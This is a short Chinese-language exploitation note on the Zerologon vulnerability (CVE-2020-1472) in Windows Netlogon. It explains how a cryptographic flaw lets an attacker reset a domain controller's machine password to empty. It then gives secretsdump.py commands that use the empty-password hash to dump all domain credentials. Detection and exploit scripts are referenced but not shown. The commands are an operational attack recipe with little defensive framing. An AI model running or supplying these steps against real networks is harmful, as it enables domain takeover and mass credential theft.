[CVE-2020-1472] Netlogon远程协议调用(MS-NRPC)权限提升(Zerologon)
此处描述的攻击利用了一个密码学认证协议(不安全地使用了AES-CFB8)的缺陷,该协议用于向域控制器(DC)证明加入域的计算机的真实性和身份。由于错误地使用了一种AES操作模式,攻击者可以伪造任何计算机账户(包括DC自身的账户)的身份,并在域中为该账户设置空密码(只需发送一系列Netlogon消息,其中各个字段填充为零)。随后可利用这一点获取域管理员凭据,然后恢复原始的DC密码。
用于检测CVE-2020-1472
用于利用CVE-2020-1472
然后,运行以下命令之一
示例格式1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
示例格式2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

原始博客文章可在此处获取
包含Python测试脚本的原始仓库可在此处获取
包含Python利用脚本的原始仓库可在此处获取